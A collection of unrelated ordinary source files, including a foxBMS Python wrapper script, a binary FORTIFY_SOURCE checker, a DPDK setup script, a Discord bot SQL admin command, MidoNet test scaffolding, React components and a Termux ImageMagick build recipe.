# foxBMS in your hardware, software, documentation or advertising materials:
#
# - "This product uses parts of foxBMS®"
# - "This product includes parts of foxBMS®"
# - "This product is derived from foxBMS®"
set -e
# MacOS
if [ "$(uname)" == "Darwin" ]; then
echo "MacOS is currently not supported."
exit 1
# Linux
elif [ "$(expr substr $(uname -s) 1 5)" == "Linux" ]; then
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
while read -r line; do
PATHS_TO_ADD=`echo "${PATHS_TO_ADD}:$line"| sed --expression='s/^M/:/g'`
done < ${SCRIPTDIR}/../../../conf/env/paths_linux.txt
PATHS_TO_ADD=`echo $PATHS_TO_ADD | awk '{gsub("C:", "/c", $0); print}'`
PATHS_TO_ADD=$(echo "${PATHS_TO_ADD#?}" | tr '\\' '/')
export PATH=$PATHS_TO_ADD:$PATH
# call find_base_conda and make sure that we do not exit by printing
# the exit code to CONDA_VARS (otherwise we would exit with set -e, here
# we will not as echo returns exit code 0)
CONDA_VARS=$($SCRIPTDIR/../../../tools/utils/bash/find_base_conda.sh || echo $?)
if [ "${CONDA_VARS: -1}" == "1" ]; then
# strip the exit code that we have printed to CONDA_VARS and
# print the rest
echo "${CONDA_VARS: : -1}"
exit 1
fi
CONDA_VARS_ARRAY=($CONDA_VARS)
CONDA_BASE_ENVIRONMENT_INCLUDING_DEVELOPMENT_ENVIRONMENT=${CONDA_VARS_ARRAY[0]}
CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT=${CONDA_VARS_ARRAY[1]}
CONDA_DEVELOPMENT_ENVIRONMENT_NAME=${CONDA_VARS_ARRAY[2]}
CONDA_DEVELOPMENT_ENVIRONMENT_CONFIGURATION_FILE=${CONDA_VARS_ARRAY[3]}
source $CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT base
conda activate ${CONDA_DEVELOPMENT_ENVIRONMENT_NAME}
set + # deactivate in any case the environment, therefore ignore errors
python "$@"
set -
conda deactivate
# Windows
elif [ "$(expr substr $(uname -s) 1 9)" == "CYGWIN_NT" ]; then
echo "Cygwin is not supported."
exit 1
elif [ "$(expr substr $(uname -s) 1 10)" == "MINGW32_NT" ]; then
echo "32bit Windows is not supported."
exit 1
elif [ "$(expr substr $(uname -s) 1 10)" == "MINGW64_NT" ] || [ "$(expr substr $(uname -s) 1 7)" == "MSYS_NT" ] ; then
CODEPAGE=`chcp.com | sed 's/[^0-9]*//g'`
if [ "$CODEPAGE" != "850" ]; then
chcp.com 850 >/dev/null 2>&1
fi
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
while read -r line; do
PATHS_TO_ADD=`echo "${PATHS_TO_ADD}:$line"| sed --expression='s/^M/:/g'`
done < ${SCRIPTDIR}/../../../conf/env/paths_win32.txt
PATHS_TO_ADD=`echo $PATHS_TO_ADD | awk '{gsub("C:", "/c", $0); print}'`
PATHS_TO_ADD=$(echo "${PATHS_TO_ADD#?}" | tr '\\' '/')
export PATH=$PATHS_TO_ADD:$PATH
CONDA_VARS=$($SCRIPTDIR/find_base_conda.sh)
CONDA_VARS_ARRAY=($CONDA_VARS)
CONDA_BASE_ENVIRONMENT_INCLUDING_DEVELOPMENT_ENVIRONMENT=${CONDA_VARS_ARRAY[0]}
CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT=${CONDA_VARS_ARRAY[1]}
CONDA_DEVELOPMENT_ENVIRONMENT_NAME=${CONDA_VARS_ARRAY[2]}
CONDA_DEVELOPMENT_ENVIRONMENT_CONFIGURATION_FILE=${CONDA_VARS_ARRAY[3]}
source $CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT base
conda activate ${CONDA_DEVELOPMENT_ENVIRONMENT_NAME}
python.exe "$@"
conda deactivate
chcp.com $CODEPAGE >/dev/null 2>&1
fi
|
class ServerCreation:
__slots__ = (
"server",
"action",
"next_actions",
"root_password"
)
def __init__(self, server, action, next_actions, root_password=None):
self.server = server
self.action = action
self.next_actions = next_actions
self.root_password = root_password
def get_server(self):
return self.server
def get_action(self):
return self.action
def get_next_actions(self):
return self.next_actions
def get_root_password(self):
return self.root_password |
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
#!/bin/bash
# if dpc++ vars path is specified
if [ ! -z "${DPCPP_VAR}" ]; then
source ${DPCPP_VAR}
fi
# if DAALROOT is specified
if [ ! -z "${DAALROOT}" ]; then
conda remove daal --force -y
source ${DAALROOT}/env/vars.sh
fi
|
#!/usr/bin/env bash
# shellcheck disable=SC2154
# these top lines are moved during build
chk_fortify_file() {
# if first char of pathname is '~' replace it with '${HOME}'
if [[ "${CHK_FORTIFY_FILE:0:1}" = '~' ]]; then
CHK_FORTIFY_FILE=${HOME}/${CHK_FORTIFY_FILE:1}
fi
if [[ -z "${CHK_FORTIFY_FILE}" ]]; then
printf "\033[31mError: Please provide a valid file.\033[m\n\n"
exit 1
fi
# does the file exist?
if [[ ! -f "${CHK_FORTIFY_FILE}" ]]; then
printf "\033[31mError: The file '%s' does not exist.\033[m\n\n" "${CHK_FORTIFY_FILE}"
exit 1
fi
# read permissions?
if [[ ! -r "${CHK_FORTIFY_FILE}" ]]; then
printf "\033[31mError: No read permissions for '%s' (run as root).\033[m\n\n" "${CHK_FORTIFY_FILE}"
exit 1
fi
# ELF executable?
out=$(file "$(readlink -f "${CHK_FORTIFY_FILE}")")
if [[ ! ${out} =~ ELF ]]; then
printf "\033[31mError: Not an ELF file: "
file "${CHK_FORTIFY_FILE}"
printf "\033[m\n"
exit 1
fi
if [[ -e /lib/libc.so.6 ]]; then
FS_libc=/lib/libc.so.6
elif [[ -e /lib64/libc.so.6 ]]; then
FS_libc=/lib64/libc.so.6
elif [[ -e /lib/i386-linux-gnu/libc.so.6 ]]; then
FS_libc=/lib/i386-linux-gnu/libc.so.6
elif [[ -e /lib/x86_64-linux-gnu/libc.so.6 ]]; then
FS_libc=/lib/x86_64-linux-gnu/libc.so.6
elif [[ -e /lib/arm-linux-gnueabihf/libc.so.6 ]]; then
FS_libc=/lib/arm-linux-gnueabihf/libc.so.6
elif [[ -e /lib/aarch64-linux-gnu/libc.so.6 ]]; then
FS_libc=/lib/aarch64-linux-gnu/libc.so.6
else
printf "\033[31mError: libc not found.\033[m\n\n"
exit 1
fi
FS_chk_func_libc=()
FS_functions=()
while IFS='' read -r line; do FS_chk_func_libc+=("$line"); done < <(${readelf} -s ${FS_libc} 2> /dev/null | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//')
while IFS='' read -r line; do FS_functions+=("$line"); done < <(${readelf} -s "${CHK_FORTIFY_FILE}" 2> /dev/null | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//')
echo_message "" "" "<fortify-test name='${CHK_FORTIFY_FILE}' " "{ \"fortify-test\": { \"name\":\"${CHK_FORTIFY_FILE}\" "
FS_libc_check
FS_binary_check
FS_comparison
FS_summary
echo_message "" "" "</fortify-test>\n" "} }"
}
chk_fortify_proc() {
if [[ -z "${CHK_FORTIFY_PROC}" ]]; then
printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
exit 1
fi
if ! (isNumeric "${CHK_FORTIFY_PROC}"); then
printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
exit 1
fi
cd /proc || exit
N=${CHK_FORTIFY_PROC}
if [[ -d "${N}" ]]; then
# read permissions?
if [[ ! -r "${N}/exe" ]]; then
if ! (root_privs); then
printf "\033[31mNo read permissions for '/proc/%s/exe' (run as root).\033[m\n\n" "${N}"
exit 1
fi
if [[ ! "$(readlink "${N}/exe")" ]]; then
printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n"
exit 1
fi
exit 1
fi
if [[ -e /lib/libc.so.6 ]]; then
FS_libc=/lib/libc.so.6
elif [[ -e /lib64/libc.so.6 ]]; then
FS_libc=/lib64/libc.so.6
elif [[ -e /lib/i386-linux-gnu/libc.so.6 ]]; then
FS_libc=/lib/i386-linux-gnu/libc.so.6
elif [[ -e /lib/x86_64-linux-gnu/libc.so.6 ]]; then
FS_libc=/lib/x86_64-linux-gnu/libc.so.6
else
printf "\033[31mError: libc not found.\033[m\n\n"
exit 1
fi
name=$(head -1 "${N}/status" | cut -b 7-)
echo_message "* Process name (PID) : ${name} (${N})\n" "" "" ""
FS_chk_func_libc=()
FS_functions=()
while IFS='' read -r line; do FS_chk_func_libc+=("$line"); done < <(${readelf} -s $FS_libc 2> /dev/null | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//')
while IFS='' read -r line; do FS_functions+=("$line"); done < <(${readelf} -s "${CHK_FORTIFY_PROC}/exe" 2> /dev/null | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//')
echo_message "" "" "<fortify-test name='${name}' pid='${N}' " "{ \"fortify-test\": { \"name\":\"${name}\", \"pid\":\"${N}\" "
FS_libc_check
FS_binary_check
FS_comparison
FS_summary
echo_message "" "" "</fortify-test>\n" "} }"
fi
}
|
module.exports = {
port: process.env.PORT,
files: ["./**/*.{html, htm, css, js}"],
server: {
baseDir: ["./src", "./build/contracts"]
}
};
|
#!/bin/sh
SCRIPT=$(readlink -f "$0")
DIR=$(dirname "$SCRIPT")
PKG_NAME='git-crypt-team'
SUMMARY="Centralized key management and rekeying for teams using git-crypt."
URL="https://github.com/inhumantsar/bash-git-crypt-team"
MAINTAINER="Shaun Martin <shaun@samsite.ca>"
fpm -s dir -t rpm -f -C $DIR \
-n $PKG_NAME --prefix /usr/bin \
-v "$(cat ${DIR}/VERSION)" -a noarch \
-m "${MAINTAINER}" --vendor "${MAINTAINER}" -d git -d gpg -d jq \
--description "$(cat ${DIR}/README.md)" \
--rpm-summary "${SUMMARY}" \
--url "$URL" --license BSD git-crypt-team
|
echo ""
echo "*******************************"
echo "PcapPlusPlus setup DPDK script "
echo "*******************************"
echo ""
show_help() {
echo "usage: setup-dpdk.sh -g AMOUNT_OF_HUGE_PAGES_TO_ALLOCATE -n NICS_TO_BIND_IN_COMMA_SEPARATED_LIST [-s] [-h]"
echo "options:"
echo " -p : amount of huge pages to allocate (huge pages are needed for DPDK's memory allocations)"
echo " -n : a comma-separated list of all NICs that will be unbinded from Linux and move to DPDK control"
echo " only these NICs will be used by DPDK. Example: eth0,eth1"
echo " -s : display current Ethernet device settings (which are binded to Linux and which to DPDK)"
echo " -h : show this help screen"
}
# setup DPDK variables
export RTE_SDK=/home/pravein/pcapplusplus/dpdk-stable-17.11.1/
# in DPDK 16.11 help scripts are stil in 'tools' dir but in 17.02 dir was renamed to 'usertools'
TOOLS_DIR=""
if [ -d $RTE_SDK/tools ]; then TOOLS_DIR=tools; else TOOLS_DIR=usertools; fi
# read and parse arguments
OPTIND=1 # Reset in case getopts has been used previously in the shell.
HUGE_PAGE_TO_ALLOCATE=0
NICS_TO_BIND=""
while getopts "h?sp:n:" opt; do
case "$opt" in
h|\?)
show_help
exit 0
;;
p) HUGE_PAGE_TO_ALLOCATE=$OPTARG
;;
n) NICS_TO_BIND=$OPTARG
;;
s) ${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
exit 0
;;
esac
done
shift $((OPTIND-1))
[ "$1" = "--" ] && shift
# verify huge page amount is indeed a string
re='^[0-9]+$'
if ! [[ $HUGE_PAGE_TO_ALLOCATE =~ $re ]] ; then
echo "Error: Huge-page amount is not a number"
echo
show_help
exit 1
fi
#verify nic list was given
if [[ $NICS_TO_BIND == "" ]] ; then
echo "Error: List of NICs to bind was not given"
echo
show_help
exit 1
fi
# setup huge-pages
CUR_HUGE=$(cat /proc/meminfo | grep -s HugePages_Total | awk '{print $2}')
if [ $CUR_HUGE != $HUGE_PAGE_TO_ALLOCATE ] ; then
HUGEPAGE_MOUNT=/mnt/huge
echo "echo $HUGE_PAGE_TO_ALLOCATE > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages" > .echo_tmp
sudo sh .echo_tmp
rm -f .echo_tmp
sudo mkdir -p ${HUGEPAGE_MOUNT}
sudo mount -t hugetlbfs nodev ${HUGEPAGE_MOUNT}
echo "1. Reserve huge-pages - DONE!"
else
echo "1. Huge-pages already allocated"
fi
# install kernel modules
IFS=","
for NIC_TO_BIND in $NICS_TO_BIND ; do
ifconfig | grep -s "^$NIC_TO_BIND" > /dev/null
if [ $? -eq 1 ] ; then
echo "2. $NIC_TO_BIND is already binded to DPDK or doesn't exist. Exiting"
echo
${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
exit 1
fi
done
lsmod | grep -s igb_uio > /dev/null
if [ $? -eq 0 ] ; then
sudo rmmod igb_uio
fi
sudo modprobe uio
sudo insmod ${RTE_SDK}/build/kmod/igb_uio.ko
echo "2. Install kernel module - DONE!"
# bind network adapter
IFS=","
for NIC_TO_BIND in $NICS_TO_BIND ; do
sudo ifconfig ${NIC_TO_BIND} down
sudo ${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --bind=igb_uio ${NIC_TO_BIND}
done
echo "3. Bind network adapters - DONE!"
${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
echo "Setup DPDK completed"
|
const { MessageEmbed, MessageActionRow, MessageButton } = require('discord.js');
const { SlashCommandBuilder, codeBlock } = require('@discordjs/builders');
const { errorlog, commanderror_message } = require('../../functions/error');
const { inspect } = require('better-sqlite3/lib/util');
module.exports = {
info: {
name: 'db',
description: 'データベースに直接接続',
usage: '[実行するクエリ文]',
aliases: [],
category: 'owner',
},
data: new SlashCommandBuilder()
.setName('db')
.setDescription('データベースに直接接続')
.addStringOption(option => {
option.setName('query');
option.setDescription('クエリ文');
option.setRequired(true);
return option;
}),
/**
* @param {import('../../utils/Bot')} client
* @param {import('discord.js').CommandInteraction} interaction
*/
run: async function (client, interaction) {
try {
const query = interaction.options.getString('query', true).split(/\s+/)[0].toLowerCase();
if (query === 'select') {
try {
await interaction.followUp(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(interaction.options.getString('query', true)).get())))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
catch (error) {
await interaction.followUp(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
}
else if (['insert', 'update', 'delete'].includes(query)) {
const buttons = new MessageActionRow()
.addComponents(
new MessageButton()
.setCustomId('ok')
.setEmoji('810436146718441483')
.setStyle('PRIMARY'),
new MessageButton()
.setCustomId('no')
.setEmoji('810436146978619392')
.setStyle('PRIMARY'),
);
const msg = await interaction.followUp(
{
content: 'この変更でいい場合はokを、取り消す場合はnoを送信してください',
embeds: [
new MessageEmbed()
.setDescription(codeBlock('sql', interaction.options.getString('query', true)))
.setColor('RANDOM')
.setTimestamp(),
],
components: [
buttons,
],
},
);
const filter = (i) => (i.customId === 'ok' || i.customId === 'no') && i.user.id === interaction.user.id;
const response2 = await msg.awaitMessageComponent({ filter, componentType: 'BUTTON', max: 1, time: 60000 });
if (!response2) { return await interaction.deleteReply(); }
else if (response2.customId === 'no') {
await interaction.deleteReply();
}
else if (response2.customId === 'ok') {
try {
await interaction.editReply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(interaction.options.getString('query', true)).run())))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
catch (error) {
await interaction.editReply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
}
}
else {
await interaction.followUp('その基本命令文は対応していません。\n`SELECT・INSERT・UPDATE・DELETE・CLOSE` のみ対応しています');
}
}
catch (error) {
errorlog(client, interaction, error);
}
},
/**
*
* @param {import('../../utils/Bot')} client
* @param {import('discord.js').Message} message
* @param {Array<string>} args
*/
run_message: async function (client, message, args) {
try {
if (!args[0]) return await message.reply('引数にクエリ文を入れてください');
const query = args[0].split(/\s+/)[0].toLowerCase();
if (query === 'select') {
try {
await message.reply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(args.join(' ')).get())))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
catch (error) {
await message.reply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
}
else if (['insert', 'update', 'delete'].includes(query)) {
const buttons = new MessageActionRow()
.addComponents(
new MessageButton()
.setCustomId('ok')
.setEmoji('810436146718441483')
.setStyle('PRIMARY'),
new MessageButton()
.setCustomId('no')
.setEmoji('810436146978619392')
.setStyle('PRIMARY'),
);
const msg = await message.reply(
{
content: 'この変更でいい場合はokを、取り消す場合はnoを送信してください',
embeds: [
new MessageEmbed()
.setDescription(codeBlock('sql', args.join(' ')))
.setColor('RANDOM')
.setTimestamp(),
],
components: [
buttons,
],
},
);
const filter = (i) => (i.customId === 'ok' || i.customId === 'no') && i.user.id === message.user.id;
const response2 = await msg.awaitMessageComponent({ filter, componentType: 'BUTTON', max: 1, time: 60000 });
if (!response2) {
return await msg.delete();
}
else if (response2.customId === 'no') {
await msg.delete();
}
else if (response2.customId === 'ok') {
try {
await msg.edit(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(args.join(' ')).run())))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
catch (error) {
await msg.edit(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
}
}
else {
await message.reply('その基本命令文は対応していません。\n`SELECT・INSERT・UPDATE・DELETE` のみ対応しています');
}
}
catch (error) {
commanderror_message(client, message, error);
}
},
}; |
#!/bin/bash
flutter pub run tool/dart_tool/strip_boilerplate_project.dart |
/*
* Copyright 2016 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.midonet.cluster.storage
import java.util.UUID
import com.codahale.metrics.MetricRegistry
import com.typesafe.config.Config
import org.apache.curator.framework.CuratorFramework
import org.apache.curator.framework.state.ConnectionState
import org.mockito.Mockito._
import rx.subjects.BehaviorSubject
import org.midonet.cluster.data.storage.model.{ArpEntry, Fip64Entry}
import org.midonet.cluster.data.storage.{InMemoryStorage, StateStorage, StateTableStorage, Storage}
import org.midonet.cluster.models.Neutron.NeutronNetwork
import org.midonet.cluster.models.Topology
import org.midonet.cluster.models.Topology.Router
import org.midonet.cluster.services.MidonetBackend
import org.midonet.cluster.services.discovery.{FakeDiscovery, MidonetDiscovery}
import org.midonet.cluster.services.state.client.StateTableClient
import org.midonet.conf.MidoTestConfigurator
import org.midonet.packets.{IPv4Addr, MAC}
import org.midonet.util.eventloop.Reactor
class MidonetTestBackend (curatorParam: CuratorFramework) extends MidonetBackend {
def this() = {
this(mock(classOf[CuratorFramework]))
}
private val inMemoryZoom: InMemoryStorage = new InMemoryStorage()
val connectionState =
BehaviorSubject.create[ConnectionState](ConnectionState.CONNECTED)
override def store: Storage = inMemoryZoom
override def stateStore: StateStorage = inMemoryZoom
override def stateTableStore: StateTableStorage = inMemoryZoom
override def stateTableClient: StateTableClient = null
override def curator: CuratorFramework = curatorParam
override def failFastCurator: CuratorFramework = curatorParam
override def reactor: Reactor = null
override def failFastConnectionState =
connectionState.asObservable()
override val discovery: MidonetDiscovery = new FakeDiscovery
override def doStart(): Unit = {
MidonetBackend.setupBindings(store, stateStore, () => {
inMemoryZoom.registerTable(classOf[Topology.Network], classOf[MAC],
classOf[UUID], MidonetBackend.MacTable,
classOf[MacIdStateTable])
inMemoryZoom.registerTable(classOf[Topology.Network], classOf[IPv4Addr],
classOf[MAC], MidonetBackend.Ip4MacTable,
classOf[Ip4MacStateTable])
inMemoryZoom.registerTable(classOf[Router], classOf[IPv4Addr],
classOf[ArpEntry], MidonetBackend.ArpTable,
classOf[ArpStateTable])
inMemoryZoom.registerTable(classOf[Topology.Port], classOf[MAC],
classOf[IPv4Addr], MidonetBackend.PeeringTable,
classOf[MacIp4StateTable])
inMemoryZoom.registerTable(classOf[NeutronNetwork], classOf[UUID],
classOf[AnyRef], MidonetBackend.GatewayTable,
classOf[GatewayHostStateTable])
inMemoryZoom.registerTable(classOf[NeutronNetwork], classOf[Fip64Entry],
classOf[AnyRef], MidonetBackend.Fip64Table,
classOf[Fip64StateTable])
})
notifyStarted()
}
override def doStop(): Unit = notifyStopped()
}
object MidonetBackendTestModule {
def apply() = new MidonetBackendTestModule
}
/** Provides all dependencies for the new backend, using a FAKE zookeeper. */
class MidonetBackendTestModule(cfg: Config = MidoTestConfigurator.forAgents())
extends MidonetBackendModule(new MidonetBackendConfig(cfg), None,
new MetricRegistry) {
override protected def getCuratorFramework() =
mock(classOf[CuratorFramework])
override protected def failFastCuratorFramework() =
mock(classOf[CuratorFramework])
override protected def backend(curatorFramework: CuratorFramework,
failFastCurator: CuratorFramework,
isCluster: Boolean) = {
new MidonetTestBackend
}
}
|
import React from 'react';
// material ui
import { IconButton, TextField } from '@material-ui/core';
import { HighlightOff as HighlightOffIcon } from '@material-ui/icons';
import { Autocomplete } from '@material-ui/lab';
import Loader from '../common/loader';
const textFieldStyle = { marginTop: 0, marginBottom: 15 };
export default class FilterItem extends React.Component {
constructor(props, context) {
super(props, context);
this.state = {
key: props.filter.key, // this refers to the selected filter with key as the id
value: props.filter.value // while this is the value that is applied with the filter
};
}
componentWillUnmount() {
clearTimeout(this.timer);
}
componentDidUpdate(prevProps) {
if (Math.abs(prevProps.filters.length - this.props.filters.length) > 1) {
this.setState({ key: undefined, value: undefined });
}
if (this.props.filter.key && this.props.filter.key !== this.state.key) {
this.setState({ key: this.props.filter.key, value: this.props.filter.value });
}
}
shouldComponentUpdate(nextProps, nextState) {
if (nextProps.filter.key && nextProps.filter.key !== this.state.key) {
return true;
}
if (nextProps.filter.value && nextProps.filter.value !== this.state.value) {
return true;
}
if (nextProps.filters.length !== this.props.filters.length) {
return true;
}
if (nextProps.loading !== this.props.loading) {
return true;
}
return !(nextState.key === this.state.key && nextState.value === this.state.value);
}
updateFilterKey(value) {
const self = this;
if (!value) {
return self._removeFilter();
}
self.setState({ key: value }, () => (self.state.value ? self.props.onSelect(self.state) : null));
}
updateFilterValue(value) {
const self = this;
self.setState({ value }, () => self.notifyFilterUpdate());
}
notifyFilterUpdate() {
const self = this;
clearTimeout(self.timer);
self.timer = setTimeout(() => (self.state.key && self.state.value ? self.props.onSelect(self.state) : null), 300);
}
_removeFilter() {
this.setState({ key: undefined, value: undefined }, this.props.onRemove());
}
render() {
const self = this;
const { filterAttributes, filters, index, itemKey, loading } = self.props;
const { key, value } = self.state;
const selectedFilter = filterAttributes.find(filter => filter.key === key) || { key, value: key };
return (
<div className="flexbox" key={itemKey} style={{ alignItems: 'center' }}>
<div className="margin-right">Device matching:</div>
<Autocomplete
autoComplete
id={`filter-selection-${index}`}
freeSolo
filterSelectedOptions
groupBy={option => option.scope}
getOptionLabel={option => option.value || ''}
includeInputInList={true}
onChange={(e, changedValue) => self.updateFilterKey(changedValue ? changedValue.key : changedValue)}
options={filters.sort((a, b) => -b.scope.localeCompare(a.scope))}
renderInput={params => <TextField {...params} label="Attribute" style={textFieldStyle} />}
value={selectedFilter}
/>
<div className="margin-left-small margin-right">Equals</div>
<TextField
label="Value"
value={value || ''}
onChange={e => self.updateFilterValue(e.target.value)}
InputLabelProps={{ shrink: !!value }}
style={textFieldStyle}
/>
{!!self.state.key && (
<IconButton className="margin-left" onClick={() => self._removeFilter()} size="small">
<HighlightOffIcon />
</IconButton>
)}
<Loader show={loading} />
</div>
);
}
}
|
import "./style.css";
import React from "react";
import styled from "styled-components";
import Navbar from "./Navbar";
import { COLORS } from "../utils/constants";
import { H5, UnderlineSpan } from "../utils/typography";
const Footer = styled.footer`
width: 100%;
background-image: ${COLORS.primaryGradient};
display: flex;
justify-content: center;
padding: 1.8rem 0;
`;
const Layout = ({ children }) => {
return (
<>
<div>
<nav>
<Navbar />
</nav>
<main>{children}</main>
<Footer>
<H5>
Made with ❤ by{" "}
<UnderlineSpan
href="https://github.com/demic-dev"
target="_blank"
rel="noreferrer"
>
demic.dev
</UnderlineSpan>
</H5>
</Footer>
</div>
</>
);
};
export default Layout;
|
<reponame>PawelBanach/madmin
class CreatePosts < ActiveRecord::Migration[6.0]
def change
create_table :posts do |t|
t.belongs_to :user
t.string :title
t.integer :comments_count
t.json :metadata
t.integer :state
t.timestamps
end
end
end
|
<filename>src/main/java/br/com/digidev/messenger4j/setup/MessengerSetupClientBuilder.java
package br.com.digidev.messenger4j.setup;
import br.com.digidev.messenger4j.common.MessengerHttpClient;
import br.com.digidev.messenger4j.internal.PreConditions;
/**
* @author <NAME>
*/
public final class MessengerSetupClientBuilder {
final String pageAccessToken;
MessengerHttpClient httpClient;
public MessengerSetupClientBuilder(String pageAccessToken) {
PreConditions.notNullOrBlank(pageAccessToken, "pageAccessToken");
this.pageAccessToken = pageAccessToken;
}
public MessengerSetupClientBuilder httpClient(MessengerHttpClient messengerHttpClient) {
this.httpClient = messengerHttpClient;
return this;
}
public MessengerSetupClient build() {
return new MessengerSetupClientImpl(this);
}
} |
<gh_stars>1-10
import {
isContainer,
isContainerAND,
isContainerOR,
isContainerDefault,
isExpression,
isExpressionPassthrow,
isExpressionDefault,
isExpressionComparator,
isExpressionLocation,
Container,
EPassthrow,
EDefault,
EComparator,
EComparatorLocation,
ContainerAND,
ContainerOR,
ContainerDefault
} from './models';
test('check types should return the correct type', () => {
const container: Container = { model: 'CONTAINER' } as Container;
const containerAND: ContainerAND = {
model: 'CONTAINER',
type: 'AND'
} as ContainerAND;
const containerOR: ContainerOR = {
model: 'CONTAINER',
type: 'OR'
} as ContainerOR;
const containerDefault: ContainerDefault = {
model: 'CONTAINER',
type: 'DEFAULT'
} as ContainerDefault;
const passExpression = {
model: 'EXPRESSION',
type: 'PASSTHROW'
} as EPassthrow;
const defaultExpression = {
model: 'EXPRESSION',
type: 'DEFAULT'
} as EDefault;
const comparatorExpression = {
model: 'EXPRESSION',
type: 'COMPARATOR'
} as EComparator;
const geoExpression = {
model: 'EXPRESSION',
type: 'GEO'
} as EComparatorLocation;
expect(isContainer(container)).toBe(true);
expect(isContainer(passExpression)).toBe(false);
expect(isContainerAND(containerAND)).toBe(true);
expect(isContainerAND(container)).toBe(false);
expect(isContainerOR(containerOR)).toBe(true);
expect(isContainerOR(container)).toBe(false);
expect(isContainerDefault(containerDefault)).toBe(true);
expect(isContainerDefault(container)).toBe(false);
expect(isExpression(container)).toBe(false);
expect(isExpression(passExpression)).toBe(true);
expect(isExpressionPassthrow(passExpression)).toBe(true);
expect(isExpressionPassthrow(geoExpression)).toBe(false);
expect(isExpressionDefault(defaultExpression)).toBe(true);
expect(isExpressionDefault(geoExpression)).toBe(false);
expect(isExpressionComparator(comparatorExpression)).toBe(true);
expect(isExpressionComparator(geoExpression)).toBe(false);
expect(isExpressionLocation(geoExpression)).toBe(true);
expect(isExpressionLocation(passExpression)).toBe(false);
});
|
<gh_stars>1-10
export default {
apiKey: process.env.MAIL_GUN_API_KEY,
domain: process.env.MAIL_GUN_DOMAIN,
host: process.env.MAIL_GUN_HOST
} |
TERMUX_PKG_HOMEPAGE=https://www.imagemagick.org/
TERMUX_PKG_DESCRIPTION="Suite to create, edit, compose, or convert images in a variety of formats"
TERMUX_PKG_LICENSE="ImageMagick"
TERMUX_PKG_VERSION=7.0.10.41
TERMUX_PKG_SRCURL=https://github.com/ImageMagick/ImageMagick/archive/$(echo $TERMUX_PKG_VERSION | sed 's/\(.*\)\./\1-/').tar.gz
TERMUX_PKG_SHA256=54a220c6905f685d25697d37a089d3a821cc4ea2e9099bdac13e7e93661a0267
TERMUX_PKG_DEPENDS="fftw, fontconfig, freetype, fribidi, glib, harfbuzz, libandroid-support, libbz2, libcairo, libffi, libgraphite, libjpeg-turbo, liblzma, libpixman, libpng, librsvg, libtiff, libuuid, libwebp, libx11, libxau, libxcb, libxdmcp, libxext, libxml2, littlecms, openjpeg, pango, pcre, zlib"
TERMUX_PKG_BREAKS="imagemagick-dev, imagemagick-x"
TERMUX_PKG_REPLACES="imagemagick-dev, imagemagick-x"
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
--with-x
--without-gvc
--with-magick-plus-plus=no
--with-bzlib=yes
--with-xml=yes
--with-rsvg=yes
--with-lzma
--disable-openmp
ac_cv_func_ftime=no
"
TERMUX_PKG_RM_AFTER_INSTALL="
share/ImageMagick-7/francais.xml
"
termux_step_pre_configure() {
if [ $TERMUX_ARCH = "i686" ]; then
#Avoid "libMagickCore-7.Q16HDRI.so: error: undefined reference to '__atomic_load'"
LDFLAGS+=" -latomic"
fi
}
|
